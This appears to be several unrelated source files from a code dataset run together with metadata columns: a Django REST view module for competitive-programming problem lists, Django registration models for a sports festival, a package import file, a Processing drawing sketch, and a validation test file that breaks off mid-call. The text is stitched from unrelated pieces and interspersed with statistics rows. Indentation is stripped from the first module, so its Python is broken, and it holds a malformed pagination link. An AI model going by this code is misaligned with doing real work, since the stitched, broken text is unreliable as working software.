if ele.platform == 'F' and temp['F']:
temp['F'] = False
codeforces(user)
elif ele.platform == 'A' and temp['A']:
temp['A'] = False
atcoder_scraper_check(user, ele)
elif ele.platform == 'U' and temp['U']:
temp['U'] = False
uva(user)
elif ele.platform == 'S':
spoj(user, ele)
elif ele.platform == 'C':
codechef(user, ele)
for ele in qs:
solve = Solved.objects.filter(user=user, problem=ele)
if not solve.exists():
curr_prob = ele.prob_id
curr_page = page
completed = False
break
if not completed:
break
page += 1
if completed:
page = 1
if self.request.GET.get('page', None):
page = self.request.GET.get('page', None)
completed = False
if page.isdigit():
page = int(page)
else:
return response.Response(
{
'status': 'FAILED',
'error': 'Page must be an integer.'
},
status=status.HTTP_400_BAD_REQUEST)
if page > cnt:
return response.Response(
{
'status': 'FAILED',
'error': 'Page Out of Bound'
},
status=status.HTTP_400_BAD_REQUEST)
qs = getqs(problem_qs, page_size, page)
if page == cnt:
Next = None
else:
Next = path + 'page=' + str(page + 1)
if page == 1:
Prev = None
else:
Prev = path + 'page=' + str(page - 1)
res = {
'status':
"OK",
'result':
ProblemSerializer(qs,
many=True,
context={
"slug": curr_list,
"user": user
}).data,
'link': {
'first': path + "page=1",
'last': path + "page=" + str(cnt),
'prev': Prev,
'next': Next,
},
'meta': {
'user':
user,
'curr_prob':
curr_prob,
'curr_unsolved_page':
curr_page,
'completed':
completed,
'name':
name,
'description':
description,
'difficulty':
difficulty,
'video_link':
video_link,
'contest_link':
contest_link,
'editorial':
editorial,
'current_page':
page,
'from': (page - 1) * page_size + 1,
'last_page':
cnt,
'path':
request.build_absolute_uri('/lists/levelwise/ladder/' +
str(slug)),
'per_page':
page_size,
'to':
page * page_size,
'total':
curr_list.problem.all().count()
}
}
if user:
res['meta']['user'] = user.username
return response.Response(res)
# class updateLadderview(generics.GenericAPIView):
# serializer_class = UpdateLadderSerializer
# def post(self,request,*args, **kwargs):
# prob_id = self.request.GET.get('prob_id')
# if prob_id == None:
# codeforces(self.request.user.username)
# uva(self.request.user.username)
# atcoder(self.request.user.username)
# else:
# if Problem.objects.filter(prob_id=prob_id,platform='F').exists():
# codeforces(self.request.user.username)
# if Problem.objects.filter(prob_id=prob_id,platform='U').exists():
# uva(self.request.user.username)
# if Problem.objects.filter(prob_id=prob_id,platform='A').exists():
# atcoder(self.request.user.username)
# if Problem.objects.filter(prob_id=prob_id,platform='C').exists():
# codechef(self.request.user.username,prob_id)
# if Problem.objects.filter(prob_id=prob_id,platform='S').exists():
# spoj(self.request.user.username,prob_id)
# return response.Response({'status' : "OK",'result' : 'ladder updated'},status = status.HTTP_200_OK)
# class updateListView(generics.GenericAPIView):
# serializer_class = UpdateListSerializer
# def post(self,request,*args,**kwargs):
# list_slug = self.request.GET.get('slug')
# page = self.request.GET.get('page')
# if list_slug is None or list_slug == "" :
# return response.Response(data={'status' : 'FAILED','error' : 'No list provided'})
# curr_list = List.objects.get(slug=list_slug)
# cnt = int(curr_list.problem.all().count()/page_size)
# if curr_list.problem.all().count() % page_size != 0:
# cnt += 1
# if page is None or page == "":
# return response.Response(data={'status' : 'FAILED','error' :'No page provided'})
# if page > cnt:
# return response.Response(data={'status' : 'FAILED','error' :'Page out of bounds'})
# #set page size here and in the serializer list waala
# page_size = 6
# problem_qs = curr_list.problem.all().order_by('rating')
# paginator = Paginator(problem_qs,page_size)
# qs = paginator.page(page)
# check = {'S' : set(),'U' : 0,'C' : set(),'F' : 0,'A' : 0}
# for prob in qs:
# platform = prob.platform
# if not Solved.objects.filter(user=self.request.user,problem__prob_id=prob.prob_id).exists():
# if platform == 'S' or platform == 'C':
# check[platform].add(prob.prob_id)
# else:
# check[platform] += 1
# print(check)
# if check['F'] > 0:
# cron_codeforces(self.request.user.username)
# if check['U'] > 0:
# cron_uva(self.request.user.username)
# if check['A'] > 0:
# cron_atcoder(self.request.user.username)
# if len(check['S']) > 0:
# for item in check['S']:
# spoj(self.request.user.username,item)
# if len(check['C']) > 0:
# list1 = codechef_list(self.request.user.username)
# list2 = check['C']
# final = set((list1) & (list2))
# for ele in final:
# prob = Problem.objects.get(prob_id=ele,platform='C')
# user = self.request.user
# Solved.objects.create(user=user,problem=prob)
# return response.Response(data={'status' : 'OK','result' :'list updated'})
class UserlistGetView(generics.ListAPIView):
permission_classes = [AuthenticatedActivated]
serializer_class = GetUserlistSerializer
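# Staff users also see admin-curated lists (isAdmin=True); regular users only see lists they own.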
def get_queryset(self):
if self.request.user.is_staff:
qs = List.objects.filter(
Q(owner=self.request.user) | Q(isAdmin=True))
return qs
else:
qs = List.objects.filter(owner=self.request.user)
return qs
class UserlistCreateView(generics.CreateAPIView):
permission_classes = [AuthenticatedActivated]
serializer_class = CreateUserlistSerializer
def get_serializer_context(self, **kwargs):
data = super().get_serializer_context(**kwargs)
data['user'] = self.request.user.username
return data
def perform_create(self, serializer):
return serializer.save(owner=self.request.user)
class UserlistAddProblemView(generics.CreateAPIView):
permission_classes = [AuthenticatedActivated]
serializer_class = UserlistAddSerializer
def post(self, request, *args, **kwargs):
data = request.data
prob_id = data.get('prob_id', None)
slug = data.get('slug', None)
platform = data.get('platform', None)
if prob_id is None or slug is None or platform is None:
return response.Response(
{
"status": 'FAILED',
'error': "prob_id or slug or platform not provided"
},
status=status.HTTP_400_BAD_REQUEST)
if not List.objects.filter(slug=slug).exists():
return response.Response(
{
"status": 'FAILED',
'error': "List with the provided slug does not exist"
},
status=status.HTTP_400_BAD_REQUEST)
if not Problem.objects.filter(prob_id=prob_id,
platform=platform).exists():
return response.Response(
{
"status":
'FAILED',
'error':
"Problem with the given prob_id and platform does not exist"
},
status=status.HTTP_400_BAD_REQUEST)
curr_list = List.objects.get(slug=slug)
curr_prob = Problem.objects.get(prob_id=prob_id, platform=platform)
if curr_list.problem.filter(prob_id=prob_id,
platform=platform).exists():
return response.Response(
{
"status":
'FAILED',
'error':
"Problem with the given prob_id and platform already exists within the list"
},
status=status.HTTP_400_BAD_REQUEST)
curr_list.problem.add(curr_prob)
return response.Response(
{
"status": 'OK',
'result': "Given problem has been added to the list"
},
status=status.HTTP_200_OK)
class EditUserlistView(generics.GenericAPIView):
permission_classes = [AuthenticatedActivated]
serializer_class = EditUserlistSerializer
def get_object(self, slug):
if self.request.user.is_staff:
if List.objects.filter((Q(isAdmin=True)
| Q(owner=self.request.user))
& Q(slug=slug)).exists():
return List.objects.get((Q(isAdmin=True)
| Q(owner=self.request.user))
& Q(slug=slug))
else:
raise NotFoundException(
"The list with the given slug does not exist")
else:
if List.objects.filter(Q(owner=self.request.user)
& Q(slug=slug)).exists():
return List.objects.get(
Q(owner=self.request.user) & Q(slug=slug))
else:
raise NotFoundException(
"The list with the given slug does not exist")
def get(self, request, slug):
curr_list = self.get_object(slug)
page = self.request.GET.get('page', None)
description = curr_list.description
public = curr_list.public
name = curr_list.name
difficulty = None
video_link = None
contest_link = None
editorial = None
if ListExtraInfo.objects.filter(curr_list=curr_list).exists():
qs = ListExtraInfo.objects.get(curr_list=curr_list)
difficulty = qs.difficulty
video_link = qs.video_link
contest_link = qs.contest_link
editorial = qs.editorial
page_size = 10
problem_qs = curr_list.problem.all().order_by('rating', 'id')
path = request.build_absolute_uri('/lists/userlist/edit/' + str(slug) +
'?')
cnt = int(curr_list.problem.all().count() / page_size)
if curr_list.problem.all().count() % page_size != 0:
cnt += 1
if page is None:
page = '1'
if cnt == 0:
return response.Response({'status': 'OK', 'result': []})
if page.isdigit():
page = int(page)
else:
return response.Response(
{
'status': 'FAILED',
'error': 'Page must be an integer.'
},
status=status.HTTP_400_BAD_REQUEST)
if page > cnt:
return response.Response(
{
'status': 'FAILED',
'error': 'Page Out of Bound'
},
status=status.HTTP_400_BAD_REQUEST)
if page == cnt:
Next = None
else:
Next = path + 'page=' + str(page + 1)
if page == 1:
Prev = None
else:
Prev = path + 'page=' + str(page - 1)
qs = getqs(problem_qs, page_size, page)
return response.Response({
'status':
"OK",
'result':
ProblemSerializer(qs,
many=True,
context={
"slug": curr_list,
"user": self.request.user
}).data,
'link': {
'first': path + "page=1",
'last': path + "page" + str(cnt),
'prev': Prev,
'next': Next,
},
'meta': {
'user':
self.request.user.username,
'completed':
False,
'name':
name,
'description':
description,
'public':
public,
'difficulty':
difficulty,
'video_link':
video_link,
'contest_link':
contest_link,
'editorial':
editorial,
'current_page':
page,
'from': (page - 1) * page_size + 1,
'last_page':
cnt,
'path':
request.build_absolute_uri('/lists/userlist/edit/' +
str(slug)),
'per_page':
page_size,
'to':
page * page_size,
'total':
curr_list.problem.all().count()
}
})
def put(self, request, slug):
curr_list = self.get_object(slug)
data = request.data
name = data.get('name', None)
description = data.get('description', None)
public = data.get('public', None)
if name is not None:
if List.objects.filter(owner=self.request.user,
name=name).exists():
return response.Response(
{
"status":
'FAILED',
'error':
"You already have a created a list with the same name "
},
status=status.HTTP_400_BAD_REQUEST)
else:
curr_list.name = name
if description is not None:
curr_list.description = description
if public is not None:
if public is not True and public is not False:
return response.Response(
{
"status":
'FAILED',
'error':
"public field can only be true or false (with the lowercase initial character)"
},
status=status.HTTP_400_BAD_REQUEST)
curr_list.public = public
if data.get('delete_probs', None):
for ele in data.get('delete_probs', None):
prob_id = ele.get('prob_id', None)
platform = ele.get('platform', None)
if not Problem.objects.filter(prob_id=prob_id,
platform=platform).exists():
return response.Response(
{
"status":
'FAILED',
'error':
"Problem with the prob_id " + ele +
" and platform " + platform + " does not exist"
},
status=status.HTTP_400_BAD_REQUEST)
curr_prob = Problem.objects.get(prob_id=prob_id,
platform=platform)
if not curr_list.problem.filter(prob_id=prob_id,
platform=platform).exists():
return response.Response(
{
"status":
'FAILED',
'error':
"Problem with the given prob_id " + ele +
" does not exists within the list"
},
status=status.HTTP_400_BAD_REQUEST)
curr_list.problem.remove(curr_prob)
curr_list.save()
return response.Response(
{
"status": 'OK',
'result': "Userlist has been updated",
'slug': curr_list.slug
},
status=status.HTTP_200_OK)
def delete(self, request, slug):
curr_list = self.get_object(slug)
curr_list.delete()
return response.Response(
{
"status": "OK",
'result': 'list with the given slug deleted'
},
status=status.HTTP_200_OK)
# class EditUserlistView(generics.RetrieveUpdateDestroyAPIView):
# permission_classes = [AuthenticatedActivated]
# serializer_class = EditUserlistSerializer
# queryset = List.objects.all()
# lookup_field = 'slug'
# def get_queryset(self):
# if self.request.user.is_staff:
# return self.queryset.filter(Q(isAdmin = True) | Q(owner = self.request.user))
# else:
# return self.queryset.filter(owner=self.request.user)
# def get_serializer_context(self,**kwargs):
# data = super().get_serializer_context(**kwargs)
# data['user'] = self.request.user.username
# return data
# def update(self,request,**kwargs):
# data = request.data
# if data.get('delete_probs',None):
# for ele in data.get('delete_probs',None):
# prob_id = ele.get('prob_id',None)
# platform = ele.get('platform',None)
# if not Problem.objects.filter(prob_id = prob_id,platform = platform).exists():
# return response.Response({"status" : 'FAILED','error' :"Problem with the prob_id " + ele + " and platform " + platform + " does not exist"},status=status.HTTP_400_BAD_REQUEST)
# if not List.objects.filter(slug = data['slug']).exists():
# return response.Response({"status" : 'FAILED','error' :"List with the provided slug does not exist"},status=status.HTTP_400_BAD_REQUEST)
# curr_prob = Problem.objects.get(prob_id=prob_id,platform = platform)
# curr_list = List.objects.get(slug=data['slug'])
# if not curr_list.problem.filter(prob_id=prob_id,platform = platform).exists():
# return response.Response({"status" : 'FAILED','error' :"Problem with the given prob_id " + ele + " does not exists within the list"},status=status.HTTP_400_BAD_REQUEST)
# curr_list.problem.remove(curr_prob)
# return super().update(request,**kwargs)
class AddProblemsAdminView(generics.GenericAPIView):
permission_classes = [AuthenticatedAdmin]
serializer_class = AddProblemsAdminSerializer
def post(self, request, *args, **kwargs):
data = request.data
slug = data.get('slug', None)
l = data.get('l', 0)
r = data.get('r', 5000)
if not slug:
return response.Response(
{
"status": 'FAILED',
'error': "slug not provided"
},
status=status.HTTP_400_BAD_REQUEST)
if not List.objects.filter(slug=slug).exists():
return response.Response(
{
"status": 'FAILED',
'error': "List with the provided slug does not exist"
},
status=status.HTTP_400_BAD_REQUEST)
curr_list = List.objects.get(slug=slug)
final = set()
wrong = set()
double = set()
rating_l = set()
rating_r = set()
if data.get('prob_id', None):
for ele in data.get('prob_id', None):
final.add(ele)
for ele in final:
if not Problem.objects.filter(prob_id=ele).exists():
wrong.add(ele)
continue
if Problem.objects.filter(prob_id=ele).count() > 1:
double.add(ele)
continue
if curr_list.problem.filter(prob_id=ele).exists():
continue
curr_prob = Problem.objects.get(prob_id=ele)
if curr_prob.rating <= l:
rating_l.add(ele)
elif curr_prob.rating > r:
rating_r.add(ele)
else:
curr_list.problem.add(curr_prob)
return response.Response(
{
"status": 'OK',
'result':
"The correct problems have been inserted in the list",
'wrong': wrong,
'double': double,
'rating_l': rating_l,
'rating_r': rating_r
},
status=status.HTTP_200_OK)
from .cron import updater
from django.http import JsonResponse
def testing(request):
updater()
return JsonResponse({'status': 'OK'})
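# --- Editor-added usage sketch (not part of the original module). ---
# A minimal example of the JSON body the update handler above expects, sent
# through DRF's APIClient in a test. The route "/api/userlist/<slug>/" and the
# field values are assumptions; the real URL pattern lives in this project's
# urls.py and may differ.
from rest_framework.test import APIClient

def example_update_userlist(user, slug):
    client = APIClient()
    client.force_authenticate(user=user)  # the view requires the authenticated owner
    payload = {
        "name": "Graph practice",           # optional rename
        "description": "BFS/DFS problems",  # optional
        "public": True,                      # must be a JSON boolean
        "delete_probs": [                    # problems to remove from the list
            {"prob_id": "1234A", "platform": "F"},
        ],
    }
    return client.put("/api/userlist/{}/".format(slug), payload, format="json")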
| 38.134588
| 197
| 0.442867
| 4,758
| 52,702
| 4.784153
| 0.052333
| 0.028819
| 0.044458
| 0.044282
| 0.845934
| 0.826956
| 0.787242
| 0.766815
| 0.756842
| 0.739665
| 0
| 0.006995
| 0.454765
| 52,702
| 1,381
| 198
| 38.162201
| 0.785175
| 0.102064
| 0
| 0.817878
| 0
| 0
| 0.077016
| 0.005717
| 0
| 0
| 0
| 0
| 0
| 1
| 0.019215
| false
| 0
| 0.011696
| 0.000835
| 0.108605
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
e135752bb040618ca7149843e1b038d01a5fc4cc
| 6,650
|
py
|
Python
|
accounts/models.py
|
Ronak-23/varchas
|
18eed0f1f94c5252212134e6e26ff8a802bed8d9
|
[
"bzip2-1.0.6"
] | null | null | null |
accounts/models.py
|
Ronak-23/varchas
|
18eed0f1f94c5252212134e6e26ff8a802bed8d9
|
[
"bzip2-1.0.6"
] | null | null | null |
accounts/models.py
|
Ronak-23/varchas
|
18eed0f1f94c5252212134e6e26ff8a802bed8d9
|
[
"bzip2-1.0.6"
] | null | null | null |
from django.db import models
from django.contrib.auth.models import User
class UserProfile(models.Model):
ACCOMMODATION_CHOICES = (
('N', 'No'),
('Y', 'Yes'),
)
GENDER_CHOICES = (
('M', 'Male'),
('F', 'Female'),
('T', 'Other'),
)
DAYS_CHOICES = (
('1', 'One'),
('2', 'Two'),
('3', 'Three'),
('4', 'Four'),
)
STATE_CHOICES = (
('1', 'Andhra Pradesh'),
('2', 'Arunachal Pradesh'),
('3', 'Assam'),
('4', 'Bihar'),
('5', 'Chhattisgarh'),
('6', 'Goa'),
('7', 'Gujarat'),
('8', 'Haryana'),
('9', 'Himachal Pradesh'),
('10', 'Jammu & Kashmir'),
('11', 'Jharkhand'),
('12', 'Karnataka'),
('13', 'Kerala'),
('14', 'Madhya Pradesh'),
('15', 'Maharashtra'),
('16', 'Manipur'),
('17', 'Meghalaya'),
('18', 'Mizoram'),
('19', 'Nagaland'),
('20', 'Odisha'),
('21', 'Punjab'),
('22', 'Rajasthan'),
('23', 'Sikkim'),
('24', 'Tamil Nadu'),
('25', 'Telangana'),
('26', 'Tripura'),
('27', 'Uttarakhand'),
('28', 'Uttar Pradesh'),
('29', 'West Bengal'),
('30', 'Andaman & Nicobar Islands'),
('31', 'Delhi'),
('32', 'Chandigarh'),
('33', 'Dadra & Nagar Haveli'),
('34', 'Daman & Diu'),
('35', 'Lakshadweep'),
('36', 'Puducherry'),
)
user = models.OneToOneField(User, on_delete=models.CASCADE)
phone = models.CharField(max_length=11)
gender = models.CharField(max_length=1, choices=GENDER_CHOICES, default='M')
college = models.CharField(max_length=128)
state = models.CharField(max_length=2, choices=STATE_CHOICES)
accommodation_required = models.CharField(max_length=1, choices=ACCOMMODATION_CHOICES, blank=True)
accomodation_type = models.CharField(max_length=1, default=1)
amount_required = models.PositiveSmallIntegerField(default=0, blank=True)
amount_paid = models.PositiveSmallIntegerField(default=0, blank=True)
no_of_days = models.CharField(max_length=1, choices=DAYS_CHOICES)
id_issued = models.BooleanField(default=False)
qr_code = models.ImageField(upload_to='qr_code', blank=True, null=True)
teamId = models.ForeignKey("registration.TeamRegistration", on_delete=models.SET_NULL, null=True, related_name="member")
def __str__(self):
return self.user.username
class EsportsUserProfile(models.Model):
GENDER_CHOICES = (
('M', 'Male'),
('F', 'Female'),
('T', 'Other'),
)
DAYS_CHOICES = (
('1', 'One'),
('2', 'Two'),
('3', 'Three'),
('4', 'Four'),
)
STATE_CHOICES = (
('1', 'Andhra Pradesh'),
('2', 'Arunachal Pradesh'),
('3', 'Assam'),
('4', 'Bihar'),
('5', 'Chhattisgarh'),
('6', 'Goa'),
('7', 'Gujarat'),
('8', 'Haryana'),
('9', 'Himachal Pradesh'),
('10', 'Jammu & Kashmir'),
('11', 'Jharkhand'),
('12', 'Karnataka'),
('13', 'Kerala'),
('14', 'Madhya Pradesh'),
('15', 'Maharashtra'),
('16', 'Manipur'),
('17', 'Meghalaya'),
('18', 'Mizoram'),
('19', 'Nagaland'),
('20', 'Odisha'),
('21', 'Punjab'),
('22', 'Rajasthan'),
('23', 'Sikkim'),
('24', 'Tamil Nadu'),
('25', 'Telangana'),
('26', 'Tripura'),
('27', 'Uttarakhand'),
('28', 'Uttar Pradesh'),
('29', 'West Bengal'),
('30', 'Andaman & Nicobar Islands'),
('31', 'Delhi'),
('32', 'Chandigarh'),
('33', 'Dadra & Nagar Haveli'),
('34', 'Daman & Diu'),
('35', 'Lakshadweep'),
('36', 'Puducherry'),
)
ESPORT_CHOICES = (
('1', 'Valorant'),
('2', 'BGMI'),
('3', 'Chess')
)
user = models.OneToOneField(User, on_delete=models.CASCADE)
phone = models.CharField(max_length=11)
gender = models.CharField(max_length=1, choices=GENDER_CHOICES, default='M')
college = models.CharField(max_length=128)
state = models.CharField(max_length=2, choices=STATE_CHOICES)
amount_required = models.PositiveSmallIntegerField(default=0, blank=True)
amount_paid = models.PositiveSmallIntegerField(default=0, blank=True)
no_of_days = models.CharField(max_length=1, choices=DAYS_CHOICES, blank=True, null=True)
id_issued = models.BooleanField(default=False)
qr_code = models.ImageField(upload_to='qr_code', blank=True, null=True)
teamId = models.ForeignKey("registration.EsportsTeamRegistration", on_delete=models.SET_NULL, null=True, related_name="member")
user_type= models.CharField(max_length=1, default='E')
team_member2 = models.CharField(max_length=128, blank=True, null=True)
team_member3 = models.CharField(max_length=128, blank=True, null=True)
team_member4 = models.CharField(max_length=128, blank=True, null=True)
team_member5 = models.CharField(max_length=128, blank=True, null=True)
team_member6 = models.CharField(max_length=128, blank=True, null=True)
captain_ingame_id = models.CharField(max_length=128, blank=True, null=True)
captain_rank= models.CharField(max_length=128, blank=True, null=True)
team_member2_ingame_id = models.CharField(max_length=128, blank=True, null=True)
team_member3_ingame_id = models.CharField(max_length=128, blank=True, null=True)
team_member4_ingame_id = models.CharField(max_length=128, blank=True, null=True)
team_member5_ingame_id = models.CharField(max_length=128, blank=True, null=True)
team_member6_ingame_id = models.CharField(max_length=128, blank=True, null=True)
team_member2_name = models.CharField(max_length=128, blank=True, null=True)
team_member3_name = models.CharField(max_length=128, blank=True, null=True)
team_member4_name = models.CharField(max_length=128, blank=True, null=True)
team_member5_name = models.CharField(max_length=128, blank=True, null=True)
team_member6_name = models.CharField(max_length=128, blank=True, null=True)
team_member2_rank = models.CharField(max_length=128, blank=True, null=True)
team_member3_rank = models.CharField(max_length=128, blank=True, null=True)
team_member4_rank = models.CharField(max_length=128, blank=True, null=True)
team_member5_rank = models.CharField(max_length=128, blank=True, null=True)
team_member6_rank = models.CharField(max_length=128, blank=True, null=True)
def __str__(self):
return self.user.username
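# --- Editor-added usage sketch (not part of the original models module). ---
# Illustrates the one-to-one link between User and UserProfile; every value
# below is illustrative, and '22' maps to 'Rajasthan' in STATE_CHOICES above.
def _example_create_profile():
    user = User.objects.create_user(username="asha", password="example-pass")
    return UserProfile.objects.create(
        user=user,
        phone="9999999999",
        gender="F",
        college="Example College",
        state="22",
        no_of_days="2",
    )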
| 39.583333
| 131
| 0.597895
| 755
| 6,650
| 5.096689
| 0.22649
| 0.136435
| 0.163721
| 0.218295
| 0.91762
| 0.91762
| 0.909304
| 0.873961
| 0.873961
| 0.873961
| 0
| 0.047868
| 0.22406
| 6,650
| 167
| 132
| 39.820359
| 0.697868
| 0
| 0
| 0.703704
| 0
| 0
| 0.157143
| 0.009774
| 0
| 0
| 0
| 0
| 0
| 1
| 0.012346
| false
| 0
| 0.012346
| 0.012346
| 0.388889
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
e1a19bcbf874d4fd41c3c72d21c560ff65bfb221
| 178
|
py
|
Python
|
indicators/tests/form_tests/__init__.py
|
mercycorps/toladata
|
4d5f9b45905a81af9981b586690e020d5b3bfc60
|
[
"Apache-2.0"
] | null | null | null |
indicators/tests/form_tests/__init__.py
|
mercycorps/toladata
|
4d5f9b45905a81af9981b586690e020d5b3bfc60
|
[
"Apache-2.0"
] | 268
|
2020-03-31T15:46:59.000Z
|
2022-03-31T18:01:08.000Z
|
indicators/tests/form_tests/__init__.py
|
mercycorps/toladata
|
4d5f9b45905a81af9981b586690e020d5b3bfc60
|
[
"Apache-2.0"
] | 1
|
2021-01-05T01:58:24.000Z
|
2021-01-05T01:58:24.000Z
|
from .result_form_unittests import *
from .indicator_form_disaggregations_unittests import *
from .indicator_custom_fields import *
from .disaggregated_value_result_form import *
| 44.5
| 55
| 0.870787
| 22
| 178
| 6.590909
| 0.5
| 0.206897
| 0.262069
| 0.386207
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.08427
| 178
| 4
| 56
| 44.5
| 0.889571
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
36139e8c19bd94567df85feaa409c88702953be8
| 460
|
pyde
|
Python
|
lesson_1_2/lesson_1_2.pyde
|
wewearglasses/intro-to-python-with-processing
|
05c672c6d796da53f5cada2f029d24f72d6b008f
|
[
"MIT"
] | null | null | null |
lesson_1_2/lesson_1_2.pyde
|
wewearglasses/intro-to-python-with-processing
|
05c672c6d796da53f5cada2f029d24f72d6b008f
|
[
"MIT"
] | null | null | null |
lesson_1_2/lesson_1_2.pyde
|
wewearglasses/intro-to-python-with-processing
|
05c672c6d796da53f5cada2f029d24f72d6b008f
|
[
"MIT"
] | null | null | null |
# Variables
center_x=50
center_y=50
diameter=10
ellipse(center_x,center_y,diameter,diameter)
# Variables allow us to change their values later
# Let's make a few changes to the variables
diameter=diameter+2
center_x=center_x+diameter
ellipse(center_x,center_y,diameter,diameter)
diameter=diameter+2
center_x=center_x+diameter
ellipse(center_x,center_y,diameter,diameter)
diameter=diameter+2
center_x=center_x+diameter
ellipse(center_x,center_y,diameter,diameter)
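# --- Editor-added follow-up sketch (not part of the original lesson). ---
# The three repeated blocks above do the same thing each time, so they can be
# collapsed into a loop; ellipse() is assumed to be available exactly as in
# the lesson (Processing Python mode).
center_x = 50
center_y = 50
diameter = 10
ellipse(center_x, center_y, diameter, diameter)
for _ in range(3):
    diameter = diameter + 2
    center_x = center_x + diameter
    ellipse(center_x, center_y, diameter, diameter)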
| 23
| 44
| 0.83913
| 77
| 460
| 4.805195
| 0.25974
| 0.208108
| 0.245946
| 0.216216
| 0.716216
| 0.716216
| 0.716216
| 0.616216
| 0.616216
| 0.616216
| 0
| 0.021176
| 0.076087
| 460
| 20
| 45
| 23
| 0.849412
| 0.202174
| 0
| 0.769231
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
36caf26bdf39e3514df2d323023625b523f5d3b0
| 3,968
|
py
|
Python
|
tests/unit/dataactvalidator/test_a35_cross_file.py
|
dael-victoria-reyes/data-act-broker-backend
|
f83c7cad29cac24d95f45a262710dc1564de7dc1
|
[
"CC0-1.0"
] | 1
|
2019-06-22T21:53:16.000Z
|
2019-06-22T21:53:16.000Z
|
tests/unit/dataactvalidator/test_a35_cross_file.py
|
dael-victoria-reyes/data-act-broker-backend
|
f83c7cad29cac24d95f45a262710dc1564de7dc1
|
[
"CC0-1.0"
] | null | null | null |
tests/unit/dataactvalidator/test_a35_cross_file.py
|
dael-victoria-reyes/data-act-broker-backend
|
f83c7cad29cac24d95f45a262710dc1564de7dc1
|
[
"CC0-1.0"
] | null | null | null |
from tests.unit.dataactcore.factories.domain import TASFactory
from tests.unit.dataactcore.factories.staging import AppropriationFactory, ObjectClassProgramActivityFactory
from tests.unit.dataactvalidator.utils import number_of_errors, query_columns
_FILE = 'a35_cross_file'
_TAS = 'a35_cross_file_tas'
def test_column_headers(database):
expected_subset = {'row_number', 'deobligations_recoveries_r_cpe', 'ussgl487100_downward_adjus_cpe_sum',
'ussgl497100_downward_adjus_cpe_sum', 'ussgl487200_downward_adjus_cpe_sum',
'ussgl497200_downward_adjus_cpe_sum'}
actual = set(query_columns(_FILE, database))
assert (actual & expected_subset) == expected_subset
def test_success(database):
""" Tests that, for entries with the matching TAS, Appropriations
deobligations_recoveries_r_cpe equals the sum of all corresponding entries
for Object Class Program Activity fields ussgl487100_downward_adjus_cpe,
ussgl497100_downward_adjus_cpe, ussgl487200_downward_adjus_cpe,
ussgl497200_downward_adjus_cpe"""
tas = TASFactory()
database.session.add(tas)
database.session.flush()
ap = AppropriationFactory(tas_id=tas.tas_id, deobligations_recoveries_r_cpe=8)
# Contributes 4
op_1 = ObjectClassProgramActivityFactory(
tas_id=tas.tas_id, ussgl487100_downward_adjus_cpe=1, ussgl497100_downward_adjus_cpe=1,
ussgl487200_downward_adjus_cpe=1, ussgl497200_downward_adjus_cpe=1)
# Contributes another 4
op_2 = ObjectClassProgramActivityFactory(
tas_id=tas.tas_id, ussgl487100_downward_adjus_cpe=1, ussgl497100_downward_adjus_cpe=1,
ussgl487200_downward_adjus_cpe=1, ussgl497200_downward_adjus_cpe=1)
assert number_of_errors(_FILE, database, models=[ap, op_1, op_2]) == 0
def test_success_scenario2(database):
tas1 = TASFactory()
tas2 = TASFactory()
database.session.add_all([tas1, tas2])
database.session.flush()
ap = AppropriationFactory(tas_id=tas1.tas_id, deobligations_recoveries_r_cpe=8)
# Contributes 4
op_1 = ObjectClassProgramActivityFactory(
tas_id=tas1.tas_id, ussgl487100_downward_adjus_cpe=1, ussgl497100_downward_adjus_cpe=1,
ussgl487200_downward_adjus_cpe=1, ussgl497200_downward_adjus_cpe=1)
# Contributes another 4
op_2 = ObjectClassProgramActivityFactory(
tas_id=tas1.tas_id, ussgl487100_downward_adjus_cpe=1, ussgl497100_downward_adjus_cpe=1,
ussgl487200_downward_adjus_cpe=1, ussgl497200_downward_adjus_cpe=1)
# Doesn't contribute, different TAS
op_3 = ObjectClassProgramActivityFactory(
tas_id=tas2.tas_id, ussgl487100_downward_adjus_cpe=1, ussgl497100_downward_adjus_cpe=1,
ussgl487200_downward_adjus_cpe=1, ussgl497200_downward_adjus_cpe=1)
assert number_of_errors(_FILE, database, models=[ap, op_1, op_2, op_3]) == 0
def test_failure(database):
""" Tests that, for entries with the matching TAS, Appropriations
deobligations_recoveries_r_cpe does not equal the sum of all
corresponding entries for Object Class Program Activity fields
ussgl487100_downward_adjus_cpe, ussgl497100_downward_adjus_cpe,
ussgl487200_downward_adjus_cpe, ussgl497200_downward_adjus_cpe"""
tas = TASFactory()
database.session.add(tas)
database.session.flush()
ap = AppropriationFactory(tas_id=tas.tas_id, deobligations_recoveries_r_cpe=7)
# Contributes 4
op_1 = ObjectClassProgramActivityFactory(
tas_id=tas.tas_id, ussgl487100_downward_adjus_cpe=1, ussgl497100_downward_adjus_cpe=1,
ussgl487200_downward_adjus_cpe=1, ussgl497200_downward_adjus_cpe=1)
# Contributes another 4
op_2 = ObjectClassProgramActivityFactory(
tas_id=tas.tas_id, ussgl487100_downward_adjus_cpe=1, ussgl497100_downward_adjus_cpe=1,
